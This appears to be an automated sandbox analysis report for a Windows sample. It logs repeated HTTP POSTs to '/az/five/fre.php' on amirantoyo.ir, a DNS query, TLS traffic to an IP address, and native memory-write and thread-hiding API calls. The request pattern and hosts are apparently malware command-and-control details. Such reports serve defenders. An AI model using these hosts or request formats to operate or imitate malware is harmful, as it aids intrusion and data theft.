Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close

Source: unknown

DNS traffic detected: queries for: andreameixueiro.com

Source: unknown

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443

Source: unknown

HTTPS traffic detected: 199.195.117.165:443 -> 192.168.2.4:49772 version: TLS 1.2

System Summary:

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Process Stats: CPU usage > 98%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7423B NtWriteVirtualMemory,LoadLibraryA,	0_2_02A7423B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A783F0 NtAllocateVirtualMemory,	0_2_02A783F0
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7D614 NtProtectVirtualMemory,	0_2_02A7D614
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DC22 LoadLibraryA,NtSetInformationThread,	0_2_02A7DC22
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A762AE NtWriteVirtualMemory,	0_2_02A762AE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7828E NtAllocateVirtualMemory,	0_2_02A7828E
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77293 NtWriteVirtualMemory,	0_2_02A77293
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A762F2 NtWriteVirtualMemory,	0_2_02A762F2
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A762C1 NtWriteVirtualMemory,	0_2_02A762C1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A782DC NtAllocateVirtualMemory,	0_2_02A782DC
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7623A NtWriteVirtualMemory,	0_2_02A7623A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E277 NtSetInformationThread,	0_2_02A7E277
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76B8F NtWriteVirtualMemory,	0_2_02A76B8F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76397 NtWriteVirtualMemory,	0_2_02A76397
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A773F6 NtWriteVirtualMemory,	0_2_02A773F6
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A763C1 NtWriteVirtualMemory,	0_2_02A763C1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77BC0 NtWriteVirtualMemory,TerminateProcess,	0_2_02A77BC0
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78305 NtAllocateVirtualMemory,	0_2_02A78305
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77357 NtWriteVirtualMemory,	0_2_02A77357
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E0CB NtSetInformationThread,	0_2_02A7E0CB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A768DB NtWriteVirtualMemory,	0_2_02A768DB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E016 NtSetInformationThread,	0_2_02A7E016
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77078 NtWriteVirtualMemory,	0_2_02A77078
